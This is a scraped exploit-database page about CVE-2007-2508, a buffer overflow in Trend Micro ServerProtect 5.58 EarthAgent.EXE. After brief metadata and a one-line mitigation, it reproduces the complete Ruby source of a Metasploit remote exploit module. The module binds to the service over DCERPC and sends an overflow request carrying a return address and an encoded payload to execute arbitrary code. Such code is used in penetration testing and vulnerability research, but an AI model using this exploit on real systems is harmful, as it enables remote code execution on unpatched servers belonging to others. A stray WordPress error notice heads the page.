Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Trend Micro ServerProtect 5.58 EarthAgent.EXE Buffer Overflow - exploit.company
header-logo
Suggest Exploit
vendor:
ServerProtect
by:
MC
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: ServerProtect
Affected Version From: 5.58
Affected Version To: 5.58 Build 1060
Patch Exists: YES
Related CWE: CVE-2007-2508
CPE: a:trendmicro:serverprotect:5.58
Metasploit:
Other Scripts:
Platforms Tested: Windows
2007

Trend Micro ServerProtect 5.58 EarthAgent.EXE Buffer Overflow

This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060 EarthAgent.EXE. By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code.

Mitigation:

Apply the latest patches and updates from Trend Micro.
Source

Exploit-DB raw data:

##
# $Id: trendmicro_serverprotect_earthagent.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::DCERPC

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Trend Micro ServerProtect 5.58 EarthAgent.EXE Buffer Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060
				EarthAgent.EXE. By sending a specially crafted RPC request, an attacker could overflow the
				buffer and execute arbitrary code.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					['CVE', '2007-2508'],
					['OSVDB', '35789'],
					['BID', '23866'],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 800,
					'BadChars' => "\x00",
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Trend Micro ServerProtect 5.58 Build 1060', { 'Ret' => 0x605e3c2f } ], # pop esi; pop ebx; ret / agentclient.dll
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'May 7 2007'))

		register_options( [ Opt::RPORT(3628) ], self.class )
	end

	def exploit
		connect
		handle = dcerpc_handle('25288888-bd5b-11d1-9d53-0080c83a5c2c', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
		print_status("Binding to #{handle} ...")

		dcerpc_bind(handle)
		print_status("Bound to #{handle} ...")

		filler =  rand_text_english(680) + Rex::Arch::X86.jmp_short(6)
		filler << make_nops(2) + [target.ret].pack('V') + payload.encoded

		len	 = filler.length

		sploit = NDR.long(0x001f0014) + NDR.long(len) + filler + NDR.long(len)

		print_status("Trying target #{target.name}...")

		begin
			dcerpc_call(0, sploit)
		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
		end

		handler
		disconnect
	end

end